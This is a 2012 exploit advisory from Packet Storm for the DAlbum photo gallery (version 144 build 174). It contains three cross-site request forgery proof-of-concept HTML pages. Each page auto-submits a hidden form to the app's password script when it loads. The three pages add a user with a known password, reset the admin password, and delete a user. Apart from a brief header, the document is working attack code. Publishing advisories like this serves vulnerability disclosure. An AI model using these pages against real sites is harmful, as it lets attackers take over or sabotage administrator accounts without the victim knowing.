Dalbum 144 Build 174 Cross Site Request Forgery

2012-03-30T00:00:00
ID PACKETSTORM:111402
Type packetstorm
Reporter Ahmed Elhady Mohamed
Modified 2012-03-30T00:00:00

Description

                                        
                                            `dalbum 144 build 174 and earlier CSRF Vulnerabilities  
===================================================================================  
# Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities  
# Vendor: http://www.dalbum.org/  
# Download link :http://www.dalbum.org/index.php?go=Downloads  
# Author: Ahmed Elhady Mohamed  
# Email : ahmed.elhady.mohamed@gmail.com  
# version: 144 build 174  
# Category: webapps  
# Tested on: ubuntu 11.4  
# This vulnerability allows a malicious hacker to add a user  
delete a user and change password of a user  
===================================================================================  
CSRF VUlnerabilities :  
  
POC 1:  
  
<html>  
<head>  
<title> Add a user </title>  
<script>  
function CSRF() {  
document.getElementById('CSRF').click();  
};  
</script>  
</head>  
<body onLoad="CSRF()">  
<form action="http://127.0.0.1/photo/pass.php" method="post" />  
<input name="user" value="CSRF" type="hidden" />  
<input name="pass" value="123" type="hidden" />  
<input name="passc" value="123" type="hidden" />  
<input type="hidden" name="action" value="add">  
<input type="submit" id="CSRF" name="submit" value="Submit">  
</form>  
</body>  
</html>  
  
POC 2:  
  
<html>  
<head>  
<title> Change user's password </title>  
<script>  
function CSRF() {  
document.getElementById('CSRF').click();  
};  
</script>  
</head>  
<body onLoad="CSRF()">  
<form action="http://127.0.0.1/photo/pass.php" method="post" />  
<input name="user" value="admin" type="hidden" />  
<input name="pass" value="111" type="hidden" />  
<input name="passc" value="111" type="hidden" />  
<input name="change" value="Change password" type="hidden" />  
<input type="hidden" name="action" value="change">  
<input type="submit" id="CSRF" name="submit" value="Submit">  
</form>  
</body>  
</html>  
  
POC 3:  
  
<html>  
<head>  
<title> Delete a user </title>  
<script>  
function CSRF() {  
document.getElementById('CSRF').click();  
};  
</script>  
</head>  
<body onLoad="CSRF()">  
<form action="http://127.0.0.1/photo/pass.php" method="post" />  
<input name="user" value="a" type="hidden" />  
<input type="hidden" name="delete" value="Delete">  
<input type="submit" id="CSRF" name="submit" value="Submit">  
</form>  
</body>  
</html>  
  
  
`